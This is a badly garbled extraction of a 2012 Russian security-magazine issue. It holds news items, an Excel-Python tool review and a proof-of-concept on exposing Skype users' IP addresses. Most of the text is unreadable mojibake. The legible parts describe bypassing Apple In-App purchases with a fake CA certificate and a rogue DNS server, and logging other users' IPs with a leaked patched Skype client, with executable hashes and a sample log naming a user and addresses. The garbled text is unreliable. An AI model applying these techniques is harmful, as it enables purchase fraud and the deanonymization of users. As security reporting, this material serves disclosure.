?)0$516#&5!%,& 0$6& ($*1,&*, /,! %&%,1*$ 5%1-,$-& 0$:!,$1, & 6$81 )0&+!%&, )#!63. M$-, «I12,10» 0$%%-$-(35$1, ! %#./$1, -!"6$ .6$#!%' $01%,!5$,' 30-#1,+1"! *.8/&+. )!%#1 ,!"!, -$- !+ 5 /$,1 )!"!5!0&# % 13-#1,+12 ;-!#'+&E12 & +$(+$/&# 12 5%,01/.. N )101)&%-1 *186. +&*& 01".#70+! D&".0&0!5$#! %#!5! «%1-%». C!#&E&7 %.*1#$ )016!,50$,&,' & &4 «5%,01/.», & 5!(*!8+!1 )01%,.)#1+&1 :#$"!6$07 !)10$,&5+!2 &+D!0*$E&& !, Facebook. 9 <,! ,!#'-! !6&+ &( *+!81%,5$ %#./$15, -!"6$ )016%,$5&,1#& )!#&E&& ?JO )!6,51086$@, )!#./1+&1 ($:#$"!501*1++34 «+$5!6!-» !, Facebook, ,! 1%,' ,$* 612%,5&,1#'+! 0$:!,$1, "#!:$#'+$7 %&%,1*$ *!+&,!-0&+"$.

F!+1/+!, :!0':!2 % )16!D&#$*& ($+&*$1,%7 +1 ,!#'-! Facebook, +! & 0$(0$:!,/&-& 60."&4 %!E&$#'+34 %105&%!5, 5 ,!* /&%#1 !0&1+,&0!5$++34 +$ %1,1531 (+$-!*%,5$ (+$)0&*10, *!:&#'+!1 )0&#!81+&1 Skout). N :.6.=1* )!6!:+31 %&%,1*3 *!610$E&& )#$+&0.@, .%,$+!5&,' & 60."&1 %$2,3, . -!,!034 (+$/&,1#'+.@ /$%,' $.6&,!0&& %!%,$5#7@, )!60!%,-&.

!"#$%&'()' "$#*&+,) -'#'. BLUETOOTH-/&0-

!" #$%&!$'"()%*+, -#,$.*( /01'"%&.$ '2) — 1$.)3.$, «'$ ,+* 4$/5"»

FACEBOOK $($&).)#!'1 ($2! "'#'")3/!

&

,

1$"%,6,* (72*3 "1(,-',2($', #5)42("',()%)8 1$+#".,8 , ()9.,3)21, #5$4',.0(79 #$%,(,-1$' !"5"/$("%" #$ "45)20 INTERNETDEFENSELEAGUE.ORG

."3"%" 2'$: 4)*()%&.$2(& %,;" !"<,(7 ,.()5.)("

3% /%&&45 #"#+&. Ford KeyFree Login /"2.)$+& ."160" 7" 8,%&9'', &" :." "-+;%<. '2-$,%7'.6 7 20","# -)/);+#.

,.()5)2."* ,4)* $( 1$+#".,, FORD

!"#$% 09 /164/ 2012014

MEGANEWS &" '()*(+" , TWITTER '(-./'0)( 3378 (1%"2$304 !" !"#"$% &'(%)*&+, '#-"(./+0 !('#. 1*(#+. %$'2+2 5275 -#+-"# + 599 3*$+'4'52"#.

!"#$%&'( )*+,*!--$./.0$( .+./1"!&$1 23( &( &+4+./5, /!0+,+ *+6! -(*+)*$1/$7 &(.0+#50+ 6(.1/0+4. 86&!0+ (./5 .*(6$ &$9 $ 4(.5-! :0"+/$%&'(. ;(*4+,+ +0/1<*1 /(02=(-

,+ ,+6! .+./+$/.1 >(./+7 (3(,+6&'7 0+&02*. Automated Trading Championship — :/+ .+*(4&+4!&$( *+<+/+4-/*(76(*+4. ?+6 0+&02*.! )*+./: 4 *(3$-( *(!#5&+,+ 4*(-(&$ <+/!- )*(6./+$/ "!0#@%!/5 /+*,+4'( .6(#0$. A+*(4&+4!&$( .+"6!&+ . B(#5@ )+)2#1*$"!B$$ !4/+-!/$%(.0+,+ /*(76$&,! $ 1"'0! )*+,*!--$*+4!&$1 MetaQuotes Language 5 (MQL5), +.&+4!&&+,+ &! 0+&B()B$$ A++. ;*$0#!6&+7 1"'0 MQL5 )*(6&!"&!%(& 6#1 !4/+-!/$"!B$$ /+*,+4'9 ./*!/(,$7. ;*+,*!--' &! &(- 0+-)$#$*2@/.1 4 $.)+#&1(-'( C!7#', 0+/+*'( -+3&+ "!)2.0!/5 4 0#$(&/.0+- /(*-$&!#( MetaTrader 5. D%!./&$-0!- )*(6#!,!(/.1 *!"*!<+/!/5 )*+,*!--', /+*,2@=$( &! *'&0( )+ +)*(6(#(&&+7 ./*!/(,$$. E /(%(&$( /*(9 -(.1B(4 *+<+/' <262/ .+4(*>!/5 /+*,+4'( .6(#0$, $ %(- <+#5>( +&$ &! &$9 "!*!<+/!@/, /(- 4'>( +0!32/.1 4 $/+,+4+7 /!<#$B(. F$ 2%!./&$0$, &$ 3@*$ &( .-+,2/ 4-(>$4!/5.1 4 /+*,+4'7 )*+B(... F! .!7/( %(-)$+&!/! (championship.mql5.com) <262/ )2<#$0+4!/5.1 &+4+./$, $&/(*45@ . !4/+*!-$ #2%>$9 *+<+/+4 $ +/%(/'. E )*+C$#( 0!36+,+ 2%!./&$0! -+3&+ <26(/ 4 *(3$-( *(!#5&+,+ 4*(-(&$ 24$6(/5 )+6*+<&2@ ./!/$-./$02 *!<+/' (,+ )*+,*!--'.

!"#$%&"%'&($ #")"*"%-*#$+,$#"%!"#$%& '%()*+'*, -('-."/

80 -6.,7 $"22'("# — .%33'(&65 !(+8"#"5 4"&$ Automated Trading Championship. 9":*$+-*2; !"2%7+- 40 -6.,7, 8' #-"("* 3*.-" $'$%- 25 -6.,7, ' :("&-8"#65 !(+8*( !"2%7+- 15 -6.,7 $"22'("#.

%

ANONYMOUS &"'/-.0)0 -"4. +)5 '/1)0#"600 %"&)0738! +"9'(,: par-anoia.net. <.2+ .'5- &* 8'/("=- #2'.-+, &' ('8:"( -'/">" /"2+7*.-#' $'&&60 #.* ('#&" %5$%- >"$6.

WIKIMEDIA FOUNDATION ')"30%/$. -(&+".: *0+ '( '/.$;$-.,059 — :*.-!2'-&65 .*(#+., (*$'/-+-("#'&+*3 /"-"(">" 3"> :6 8'&+3'-;., /'?$65, /'/ # .2%7'* . Wikipedia.

&"'%$. 3" +(-./' # THE PIRATE BAY, 1)(#0%(,#" IP-"+%$-(, 3" /%(,3$ '%(-,"4+$%(, ,$)0#(1%0."300, 30+$%)"3+(, 0 +%/*0! -.%"3 , %$"):3(-.0 (#"&")0-: 1$-'()$&38. 9".2* 1 4*#('2, P2P--('4+/ &* -"2;/" ".-'2., !(+3*(&" &' -"3 ?* %("#&*, 7-" + ('&;)*, &" # /'/+*--" $&+ $'?* !(*#6.+2 «$":2"-/'$&6*» !"/'8'-*2+, ."":@+2 .!*A+'2+.- >"22'&$./">" !("-#'5$*(' XS4All.

!$#-$.&/0 12.%(3"!*$+ !*'&"%(*!2 %!$ 3$&-4$0"1#&'2# /&2&1/&1-2 (& WHITEHAT SECURITY

!0 )*!4$#+, +/%(/' 0+-)!&$7, "!&$-!@=$9.1 $&C+*-!B$-+&&+7 <("+)!.&+./5@, 4',#161/ 26*2%!@=(: /'.1%$ 4$*2.+4 +9+/1/.1 &! <(""!=$/&'9 )+#5"+4!/(#(7, 4 .+C/( .)#+>5

$ *16+- +<&!*23$4!@/.1 21"4$-+./$, $ 4++<=( — «4.( )#+9+». G(60+ 0+,6! 4'9+6$/ $..#(6+4!&$( . )*+/$4+)+#+3&'-$ 4'4+6!--$. H!0+( $..#(6+4!&$( &(6!4&+ +)2<#$0+4!#! 0+-)!&$1 WhiteHat Security, +<(.)(%$4!@=!1 <("+)!.&+./5 4(<-)*$#+3(&$7. ;+ (( 6!&&'-, 0+#$%(./4+ .(*5("&'9 21"4$-+./(7 +=2/$-+ .+0*!/$#+.5 "! )+.#(6&(( 4*(-1. A+/*26&$0$ 0+-)!&$$ .+<$*!@/ ./!/$./$02 (3(,+6&+, .0!&$*21 .+6(*3$-+( &(.0+#50$9 /'.1% .!7/+4 4 /(%(&$( 4.(,+ ,+6!. H!0, 4 2011 ,+62 )+ *("2#5/!/!- .0!&$*+4!&$1 <+#(( 7000 .!7/+4 (.+/&$ /(*!<!7/ 0+&/(&/!) $- 26!#+.5 +<&!*23$/5 4 .*(6&(- 79 .(*5("&'9 21"4$-+./(7 &! 0!36+- .!7/(. I#1 .*!4&(&$1: 4 2010 ,+62 /!0+4'9 <'#+ 230, 4 2009 ,+62 — 480, 4 2008 ,+62 — 795, 4 2007 ,+62 — 1111. G!62(/ $ /+/ C!0/, %/+ .(*5("&'( 21"4$-+./$ ./!#$ <'./*(( 2./*!&1/5: 4 2011 ,+62 .*(6&(( 4*(-1 "!0*'/$1 21"4$-+./$ .+./!4$#+ 38 6&(7, /+,6! 0!0 4 2010 ,+62 :/+ "!&$-!#+ 110 6&(7.

;*+B(&/ "!0*'4!(-'9 21"4$-+./(7 4 )*+>#+- ,+62 /+3( 4'*+. . 53 6+ 63. J.#$ *!..-!/*$4!/5 21"4$-+./$ )+ /$)!-, /+ &! )(*4+- -(./( )+ )+)2#1*&+./$ +./!(/.1 -(3.!7/+4'7 .0*$)-/$&, (XSS), 0+/+*'7 4./*(%!(/.1 &! 55% .!7/+4. I!#(( 2/(%0$ $&C+*-!B$$ (53% .!7/+4), 0+&/(&/-.)2C$&, (36%), &(6+./!/+%&!1 !4/+*$"!B$1 (21%) $ -(3.!7/+4!1 )+6-(&! "!)*+.! (CSRF, 19%). H+#50+ &! 4+.5-+- -(./( 4 .)$.0( +0!"!#$.5 SQL-$&K(0B$$: $9 +<&!*23$#$ 4.(,+ &! 11% .!7/+4.

K

!"#$% 09 /164/ 2012 015

!"#$"% &'(')*+ 21-!",+*% ("$"(-"( *. /'$$** 010)(*!$2 0$,('*,3 +4$,'25*% 6"("6'!'7 8 $,4+" #'(6'(49** Apple. :,';< 6'$,48*,3 «2;!'-+*#'8» +4 0=*, '#4.4!'$3 )'-

$,4,'-+' '$05"$,8*,3 ("8"($-*+>*+*(*+? 6(','#'!4 14?4.*+4 App Store * '60;!*#'84,3 8 @",* *+$,(0#9*A (chto.su/2012/07/appstore.html), #4# 6'))"!4,3 -"#* In-App )!2 6'#06'# 8+0,(* 6(*!'>"+*%. B'8'(2 6('5", &'(')*+ 6'8")4! 1*(0, #4# «6'#064,3 ;"$6!4,+'» #'+,"+, 8+0,(* !A;'?' 6(*!'>"+*2, +46(*1"( +'8<" 0('8+*, ;'+0-$<, *?('8<" 6(")1",< * ,4# )4!"". C" 6')014%, -,' 74#"( $)"!4! D,' $!0-4%+' *!* +" .4;',*!$2 ' 6'$!")$,8*27 — &'(')*+ $(48+*84", In-App-6'#06#* $ -*,"($,8'1 * $ «6(')4>"% 8'.)074», 8")3 8 ("4!3-+'$,* )"+3?* ;"(0, .4 (4.;!'#*('8#0 #'+,"+,4, #','(<% 0>" * ;". ,'?' 6(*$0,$,80", +4 0$,('%$,8".

@6'$'; 74#"( (4.(4;',4! 0+*8"($4!3+<%, '+ )"%$,80", 6(4#,*--"$#* 8 !A;'1 6(*!'>"+**. E',(";0",$2 !*=3 '$05"$,8*,3 4,4#0 ,*64 MITM +4 $8'% $';$,8"++<% $14(,F'+, 0$,4+'8*8 +4 +"?' )84 F4!3=*8<7 CA-$"(,*F*#4,4 * 6('6*$48 F4!3=*8<% DNS, #','(<% 2#';< #"=*(0", ',8",< ', $"(8"(4 Apple, 6'),8"(>)42 $)"!4++0A 6'#06#0. G 6'),8"(>)"+*" 6'#06#* F4!3=*8<% DNS-$"(8"( 8<)4", 0$,('%$,80 F4!3=*80A #8*,4+9*A $,4+)4(,+'?' ';(4.94.

&0#84!3+' -"(". +")"!A 6'$!" 60;!*#49** *+$,(0#9** H!"#$"% &'(')*+ $,4! +4$,'25"% .8".)'%: "?' 6'#4.4!* 6' ,"!"#4+4!0 «/'$-$*2», 0 +"?' 8.2!* *+,"(83A )!2 +"$#'!3#*7 $4%,'8, * )4>" ?4.",4 «G")'1'$,*» '60;!*#'84!4 6(' +"?' $,4,3A 8 .4#(<,'1 (4.)"!", .4-5*5"++'1 In-App-6'#06#'% (8', )4>" .!';+' =0,*,3 +" 7'-",$2 +4 D,0 ,"10). I'(6'(49*2 Apple, 8 $8'A '-"(")3, ;".0$6"=+' 6<,4",$2 0)4!*,3 $ (4.!*-+<7 7'$,*+?'8 8<="06'12+0,<" $"(,*F*#4,< * .4-;!'#*('84,3 DNS-$"(8"(<. E'#4 8$" ,5",+'. @6'$'; 6'-6(">+"10 (4;',4", (6' $'$,'2+*A +4 21 *A!2). E' +"#','(<1 )4++<1, ,4#*1 1",')'1 0>" $)"!4+' ;'!"" 8,46 1*!!*'+4 ;"$6!4,+<7 6'#06'#.

Apple 0>" +4-4!4 6(';'84,3 )(0?*" ,"7+*-"$#*" $6'$';< .45*,<. C")48+' #'164+*2 6(*+2!4$3 8+")(2,3 0+*#4!3+<" *)"+,*F*#4,'(< 8 #4>)0A #8*,4+9*A +4 6'),8"(>)"+*" 6'#06#*. /4.(4;',-*#* $'';54A,, -,' 8 #8*,4+9** 6'28*!'$3 +'8'" 6'!" «unique_identifer». J'>+' 6(")6'!'>*,3, -,' '+' )'!>+' $')"(>4,3 0+*#4!3+<% +'1"( 0$,('%$,84 Unique Device Identifier (UDID), $'-8"(=4A5"?' 6'#06#0.

K$!* ,4#, ,' 6')';+'" )"%$,8*" *)", 8 (4.(". $ 6'$!")+"% 6'!*,*#'% Apple, $'?!4$+' #','('% 6(*!'>"+*21 .46("54!'$3 $'-;*(4,3 UDID $ 0$,('%$,8. L4# -,' 86'!+" 8'.1'>+', -,' «0+*#4!3+<% *)"+,*F*#4,'(» ;0)", $'',8",$,8'84,3 +" 0$,('%$,80, 4 ',)"!3+'% 6'#06#". K$!* 6' D,'10 *)"+,*F*#4,'(0 6'#06#4 ;0)", 6('8')*,3$2 +4 $"(8"(" Apple * $8"(2,3$2 $ +*1 8' 8("12 ,(4+.4#9**, ,' ,4#*1 ';(4.'1 1'>+' 6'6(';'84,3 ;'(',3$2 $ 74#'1, #','(<% 6(")!'->*! H!"#$"% &'(')*+. G #'+9" *A!2 $6"9*4!*$,< Apple .4#(<!* 02.8*1'$,3, * &'(')*+ 6'),8"()*! 8 $8'"1 ;!'?", -,' ,"6"(3 ';7') $*$,"1< 6' $05"$,80A5"% ,"7+'!'?** +"8'.1'>"+.

!"##$%#&$% '(&)! «*#&!+,» APP STORE

"

&' GOOGLE PLAY ($)$%* +,-., /0"1$.., /)%"213(* )%&1,-$.&3+& !" #$%&' ()*+' ,(-.*/(-)"' — ,0"#1-2 +' +#+ *%!*)#1-2.

!"#$% &"'"#!$% ("') APPLE

*#) -"*+) .(/$-+ * )*!"0) #&"!" 1&".0,)&2132 #$#2)."% *+4"*( #,156 #0(#)-$7, 0" #12$ — 8(29$&(.$ 0)!)8*$5)-$7

& 2015 :"81 (*2" )*!"0+ "#-(#272 #$#2)."% ECALL

6'!+'-3 $ 30 *A+2 +4 1 *A!2 D,4!'++<" 1*('8<" 4,'1+<" -4$< ;<!* 6(*'$,4+'8!"+< +4 ')+0 $"#0+)0 )!2 $*+7('+*-.49** $ 4$,('+'1*-"$#*1 8("1"+"1 M"1!*. G $82.* $ -"1

8 6'$!")+"% 1*+0," '#4.4!4$3 61 $"#0+)4 * +"#','(<" -4$< $,4!* 6'#4.<84,3 8("12 «23:59:60» *!* )84 (4.4 6' «23:59:59». N.-.4 +"$6'$';+'$,* +"#','(<7 6(*!'>"+*% ';(4;',4,3 6'28!"+*" !*=+"% $"#0+)< 1+'?*" $4%,< *$6<,<84!* 6(';!"1< (8 ,'1 -*$!" Reddit, LinkedIn * Mozilla), +4;!A)4!'$3 14$$'8'" .48*$4+*" $"(-8"(+<7 6(*!'>"+*% (8 '$+'8+'1 Hadoop * Cassandra), @O&P MySQL $Q")4!4 8$" 6('9"$$'(+<" ("$0($<, ',#!A-4!*$3 VPN-,0++"!* +4 ;4." Op"nVPN, .48*$4!* Linux-$"(8"(< ($0)2 6' ;4?-("6'(,41, $ +" ';+'8!"++<1 84+*!3+<1 2)('1, $';(4++<1 8(0-+0A).

G ;'!3=*+$,8" $!0-4"8 4)1*+*$,(4,'(< ;<!* 8<+0>)"+< 6"(".460$,*,3 .48*$=*" $"(8"(<. L"1 +" 1"+"" )!2 $,4;*!*.4-9** 6(*!'>"+*%, +4-48=*7 6',(";!2,3 *.!*=+*" ("$0($< CPU, )'$,4,'-+' ;<!' 8(0-+0A 8<$,48*,3 #'(("#,+'" 8("12 #'14+)'% «date 'date +"%m%d%H%M%C%y.%S"'». P!2 +"#','(<7 $*$,"1 )'-6'!+*,"!3+' 1'?!' 6',(";'84,3$2 '$,4+'8*,3 )"1'+ ntpd +4 8("12 8<6'!+"+*2 )4++'% #'14+)< * 6"(".460$,*,3 6'>*(4A5*" CPU 6(*!'>"+*2.

:,';< 0$,(4+*,3 +"?4,*8+<% DFF"#,, #'164+*2 Google 6(")-!'>*!4 (4.;*,3 !*=+AA $"#0+)0 +4 ;'!3='% *+,"(84! #'(("#,*-('8#*, $ 6(*;48!"+*"1 #4>)<% (4. 6' 1*!!*$"#0+)", -,' 6(*8")", # 6!48+'10 «(4.14.<84+*A» $"#0+)< 6' ;'!3='10 ',(".#0 8("1"+*. E'7'>"" ?','8'" 6(4#,*-"$#'" ("="+*" ($#(*6, fixtime.pl )!2 6!48+'?' 6(*;48!"+*2 $"#0+)<) 1"$29 +4.4) '60;!*#'84! ')*+ *. (4.(4;',-*#'8 Opera 8 $8'"1 ;!'?": goo.gl/vB45m.

#$*!$ +$*,$% -.+/!,$

2

0)!)*"8 .$!"*+' (2".-+' 9(#"* -( "8-1 #)&1-81 0!$*), & .(##"*".1 4(*$#(-$3 #)!*)!-+' 0!$,"5)-$%

HEADER

!"#$% 09 /164/ 2012016

!"#"$!% &'()* +#,+$%

!"#$%"$ $%%&'$, ( )&*&+,- "&.&/&0 /1$#2341.(5 2'.16/$725 DataNitro 2 Excel

!"#$%&'( )$#( #*+, -.//.012 /3456, 70+0825 95*:.+80*+-10 8;90+;3+ < Excel * *;-2-. 092=12-. >/57+80112-. +;9/.?;-.. #*+, 0=51, 8547.5 @.7., 70+0825 .*A0/,BC3+ -;7*.-C- <0B-0D-10*+56 <*+805110@0 VBA-EB27;, =+092, 7 A8.--58C, 0906+. 0@8;1.=51.5 1; B;AC*7 -5154-D58; B;4;=, 85;/.B0<;< *<06 *09*+<51126. ( 0+10FC*, 7 A58<0-C +.AC :). ( *./,10 15 /39/3 *0*+;</E+, 0+=5+2. G8.4C-;+, 90/55 C12/05 B;1E+.5 15<0B-0D10: <BE+, 4;1125 0++C4;, <*+;<.+, < +;9/.?C, <BE+, 4;1125 .B 48C@0@0 -5*+; . 0AE+, <*+;<.+, < +;9/.?C. G0-*/5 +85+,5@0 +;70@0 0+=5+; E 85F./ >+0 45/0 ;<+0-;+.B.80<;+,. H;4;=; 7;B;/;*, <A0/15 B5-106, 5*/. 92 15 0410 10 — .-5+, 45/0 *0 <*+805112- VBA *0<58F5110 15 :0+5/0*,. I +0-C D5 1CD10 92/0 098;9;+2<;+, */0D125 J08-;+2 J;6/0<, ; A.*;+, * 1C/E A;8*58 1.*70/,70 15 A8.</57;/0. K 407C-51+0- 1;40 92/0 8;90+;+, A0*+0E110, A0>+0-C <;8.;1+ 1;A.*;+, <15F1.6 *78.A+ 1; Python, 70+0826 1; 0*10<5 xls-F;9/01; *0B4;<;/ 92 0+=5+, <*+;</EE 1CD125 4;1125, 15 @04./*E (:0+E .B1;=;/,10 E :0+5/ 45/;+, .-5110 +;7). «&0+ 5*/. 92 < Excel 92/ <*+8051 Python 4/E *78.A+.1@;, +0 <*5 92/0 92 < 45*E+, 8;B A80L5», — A04C-;/ E . 1;98;/ < Google: «excel with python». %7;B;/0*,, =+0 A0409106 58C1406 92/ 0B;4;=51 15 +0/,70 E :).

EXCEL + PYTHON %4.1 .B A58<2: 1;645112: A8057+0< — PyXLL (www.pyxll.com) A0B<0/E/ 92*+80 A.*;+, 1; A.+015 JC17?.., 70+0825 4;/55 -0D10 92/0 .*A0/,B0<;+, 1;8;<15 *0 *+;14;8+12-. JC17?.E-. Excel'E (<8045 KMNN'()). ( 4;D5 A0A8090<;/ 5@0 < 456*+<... &2@/E4.+ >+0 +;7: +2 A.F5F, Python-*78.A+ < *00+<5+*+<.. * 15-70+082-. A8;<./;-., 85;/.BCE 1509:04.-25 456*+<.E * A0/C=;5-2-. 4;112-., A0*/5 =5@0 =585B *A5?.;/,126 ;4401 4/E Excel'E .-A08-+.8C5F, 1;A.*;1125 JC17?... O5 +;7 A/0:0, 10 :0+5/0*, A8E-0 < 7045 Python 098;L;+,*E 7

1CD12- E=567;- >/57+801106 +;9/.?2. ) >+0 A0B<0/E/ 48C@06 1;6451126 ;4401 DataNitro (datanitro.com). G0*/5 5@0 C*+;10<7. < Excel'5 A0E</E5+*E 10<;E <7/;47;, 0+7C4; <2B2<;5+*E 854;7+08. )1+5@8;?.E <2A0/151; 0=51, C40910, A0>+0-C -0D10, 15 *./,10 B;-08;=.<;E*,, 1;-A.*;+, =+0-+0 <8045:

Cell(«A1»).value = «Hello, World!»

$;/55 B;AC*7;5- *?51;8.6 * A0-0L,3 710A7. 1; A;15/. +C/9;8; . A0/C=;5- 1CD105 B1;=51.5 < E=5675 A1! O540/@0 4C-;E, E *+;/ 1;8;L.<;+, JC17?.01;/, 70+0826 -15 92/ 1CD51. G809C3 .-A08+.80<;+, 9.9/.0+57. 4/E 8;90+2 * 1CD12-. J08-;+;-. . A80=.-+;+, 4;1125 — <*5 8;90+;5+. H;A8;F.<;3 =5-85B API .1J08-;?.3 .B 15*70/,7.: 01/;61-*58<.*0< — <*5 0+/.=10 ;@85@.8C5+*E. G.FC A80*+51,7C3 A8.9/C4C 4/E 8;**2/7. 0+=5+0< — <*5 0+/.=10 0+A8;</E5+*E. & .+0@5 B; +8.4?;+, -.1C+ C4;5+*E *45/;+, *78.A+, 70+0826 9C45+ >7010-.+, 4<; =;*; — +5, =+0 A85<8;L;/.*, 4/E -51E < A2+7C :). KA58<; E 4;D5 1;=;/ <2A0/1E+, < Python <*5 8;*=5+2, /.F, A0BD5 <*A0-1.<, =+0 * >+.- *A8;<.+*E *;- Excel. &A80=5-, 5*/. 1CD10 A0*=.+;+, =+0-+0 *58,5B105, +0 1.=5@0 15 *+0.+ A04@8C-

B.+, -;+5-;+.=5*7.6 -04C/, NumPy . 45/;+, /3925 1;C=125 <2=.*/51.E.

&PQ'RS N'IK)NMN K78.A+.1@ 1; Python — <*5@4; @;8;1+.E :080F56 8;*F.8E5-0*+. A8./0D51.E. &BE+, :0+E 92 854;7+08 Sublime Text: A/;@.12 4/E 15@0 5*+, CD5 1; /3906 */C=;6 D.B1.. &A80-=5-, -0D10 15 :04.+, 4;/570 B; A8.-580-. %4.1 .B *0B4;+5/56 DataNitro < 7;=5*+<5 .//3*+8;?.. <0B-0D10*+56 *<056 8;B-8;90+7. 1;A.*;/ 1; Excel’5 Twitter-7/.51+ (A04809155 -0D10 A80=.+;+, B45*,: bit.ly/Res2mZ). G8.=5- -.1.-;/,12-. C*./.E-. 9/;@04;8E A.+010<*706 0958+75 4/E Twitter API — tweepy (github.com/tweepy/tweepy). I015=10, >+0 <*5@0 /.F, Proof-of-Concept, 10 B;+0 :080F;E .//3*+8;?.E +0@0, =+0 .1+5@8;?.E * Python * 5@0 0@80-12- 70/.-=5*+<0- @0+0<2: -04C/56 1; /3906 */C=;6 D.B1. -0D5+ 92+, 0=51, A0/5B106. I*+;+., *45/;+, +;7C3 J.F7C 15 +;7 CD . */0D10, 0 =5- A.F5+*E < 0J.?.;/,106 407C-51+;?.. Python. ' 0*<0.+, 0*10<2 EB27; -0D10 B; A0/=;*;. I */0<C, .1+58;7+.<1;E F70/; A0 A80@8;--.80<;1.3 Codeacademy 7;7 8;B <2AC*+./; 15A/0:06 7C8* (http://www.codecademy.com/tracks/python). z

G"% R%, I'I ( EXCEL C G)R%O%N G%$"MQ)T

!"#$% 09 /164/ 2012 017

!"#$%&'(")* +,-./0123 45,6789.5:3 ;.45.82: 8/<=: . 528>579:: IP-265,8.; 4./0?.;29,/,@ Skype 4.3;:/:80 /,9.A 2011 B.62, >.B62 =2>,5 #C:A D<1A2E.; :? &7>97;>252 .8<F,89;:/ .--529E7@ :EG:E:5:EB 8925.B. 45.9.>./2 Skype (;,58:@ 1.x/3.x/4.x), ?24<89:/ -/.B skype-open-source.blogspot.com : ;7/.G:/ -:E25E:> 6,.-C<8H:5.;2EE.B. >/:,E92.

$2/01, — -./01,. 25 A2592 2012 B.62 ;71/2 6,.-C<8H:5.;2EE23 ;,58:3 >/:,E-92 5.5, >.9.523 A.B/2 4./E.H,EE. 52-.9290 ; 6,@89;<IF,@ 8,9: Skype, — : E2J2/280 E289.3F23 ;,8,/<=2. D/2B.6253 5281:C5.;->, 45.9.>./2 892/. 4.E39E., B6, 8A.95,90 IP-265,8 45: <892E.;>, 453A.B. 8.,6:E,E:3 8 4./0?.;29,/,A, E245:A,5, ;. ;5,A3 ?;.E>2. K 245,/, : ;.;8, 4.3;:/83 ;?/.A2EE7@ SkypeKit — 8,5;,5E23 ;,58:3 Skype, >.9.523 4.>2?7;2/2 IP-265,82 /I-7= 4./0?.;29,/,@. L<90 4.?G, ;738E:/.80, J9. 62G, ; >/:,E9-8>.@ 6,.-C<8H:5.;2EE.@ ;,58:: 5.5, 2 :A,EE. ; .9/26.JE7= /.B2= 45.B52AA7, A.GE. 4.-8A.95,90 IP-265,8 /I-.B. 4./0?.;29,/3, ,8/: ?245.8:90 ,B. vCard (:EC.5A2H:3 . >.E92>9,). !5: M9.A 62G, E,.-3?29,/0E. 6.-2;/390 ,B. ; >.E92>97, 9. ,890 IP-265,8 .9.-52G2,983 E,?2A,9E. 6/3 G,59;7.

NOL#P Q'( +RS+( N2J,A <?E2;290 IP-265,8 4./0?.;29,/3? K.-4,5;7=, :? J:89.B. /I-.47989;2. )E9,5,8E., ; >2>.A B.5.6, : 8952E, G:;,9 J,/.;,>,

E<GE7@ E:>. N29,A A.GE. ?2>5790 >/:,E9 : :69: :?<J290 9,>89.;7@ /.B (8A. /:89:EB). +<GE. E2@9: 4./, PresenceManager 8 E:>.A 4./0?.;29,/3.

K 5281:C5.;2EE7= /.B2= .9.-52G2I983 5,2/0E7@ IP-265,8 (8 >/IJ.A -r) : /.>2/0E7@ IP-265,8 8,9,;.@ >2597 (-l) I?,52. KE<95,EE:@ 265,8 E<G,E Skype, 4.9.A< J9. .E ; E,>.9.57= 8/<J23= :84./0?<,9 4,5,62J< 952C:>2 4. /.->2/0E.@ 8,9:.

)E9,5,8E., J9. :EC.5A2H:3 .- IP-265,8, 6.89<4E2, 62G, ,8/: 4./0?.;29,/0 E2=.6:983 ; .C/2@E,. T2> 4.>2?7;2,9 .479, IP-265,8 4./0?.;29,/3 =52E:983 E,8>./0>. 6E,@. #8/: .E <1,/ ; .C/2@E E2 -./,, 6/:9,/0E., ;5,A3, IP-265,8 :8J,?2,9 :? 8,9:.

skype55_patched.exeMD5 7381deed3e9937ef2206f6bec1023c47SHA-1 1831e6631b95e93173d899a256769c02c c31eb06ED2K e243c24c67faf733f39828ddfc4a50f8

skype59_patched.exeMD5 1233d32e9cb54684cfa7ce093033e3a1SHA-1 69d50a22019842be494f5c857dd40fa5b7 f2dcdbED2K 16c9617a0e1c0236ecca39dd35f7f4a0

ǫȢȗ Skype (ȨȤȔȗȠșȡȦ):00:26:34.406 T#3604 Router: _Ș“Ȅ 0xe9b65734c94911d5-s-s213.165.179.165:40006-r86.57.149.147:25801-l192.168.0.80:258012 2 0 1 _000:26:34.406 T#3604 PresenceManager: _ȕȁȷ olechka02321 0xe9b65734c94911d5-s-s213.165.179.165:40006-r86.57.149.147:25801-l192.168.0.80:25801 _8000000300:26:34.406 T#3604 PresenceManager:_ȔȼȻ olechka02321 e9b65734 c94911d5 0 1initial ping_

T2> ;:6:10, A7 -,? .8.-7= <8:/:@ ;7-93E</: IP-265,8 8.-,8,6E:>2 :? 6,.-C<8H:-5.;2EE7= /.B.;. +. -<60 .89.5.G,E 8 M9.@ 9,=E:>.@ — Skype -2E:9 2>>2<E97, >.9.57, .J,E0 J289. ?24521:;2I9 vCard. z

Proof-of-Concept!"#$%&" IP-'(%)!' *#+,-#.'$)+)/ SKYPE

!"#$%&'( !&')#* (alizar@gmail.com)

>2>:A 45.;2@6,5.A 4./0?<,983. K.-;9.57=, M9. E<GE. 6/3 45.;,5>: /:JE.89: J,/.;,>2, >.9.57@ ;71,/ 8 ;2A: E2 >.E92>9: 9.9 /: .E, ?2 >.B. 8,-3 ;762,9. +2>.E,H, M92 45.H,6<52 4.?;./3,9 45.;,5:90 82A.B. 8,-3, 9. ,890 E, ?24<F,E /: B6,-9. E2 89.5.EE,A >.A40I9,-5, :E892E8 Skype 8 92>:A G, :A,E,A 4./0?.-;29,/3. K .9/26.JE7= /.B2= -<6<9 <>2?2E7 ;8, IP-265,82, 4. >.9.57A 52-.92,9 >/:,E9.

#8/: >9. E, 4.E3/: 45.9.>./ Skype <895.-,E 92>:A .-52?.A, J9. ;7 A.G,9, ?24<89:90 :E892E87 >/:,E92 E2 E,8>./0>:= >.A40I-9,52= : ;8, 9,>89.;7, 8..-F,E:3 -<6<9 4.89<4290 .6E.;5,A,EE. ;. ;8, :E892E87. U.93 : B.;.539, J9. Microsoft 4,5,6,/7;2,9 25=:9,>9<5< Skype 6/3 A288.;.@ 45.8/<1>: 4./0?.;29,/,@, E. 4.>2 M9. /:10 6.A78-/7. +2 8,B.6E31E:@ 6,E0 82A7@ 5,2/0E7@ 84.8.- 45.8/<1:;290 4./0?.;29,/3 — <?E290 ,B. 425./0 : ?24<89:90 < 8,-3 6.4./E:-9,/0E7@ :E892E8 >/:,E92 4.6 ,B. <J,9E.@ ?24:80I.

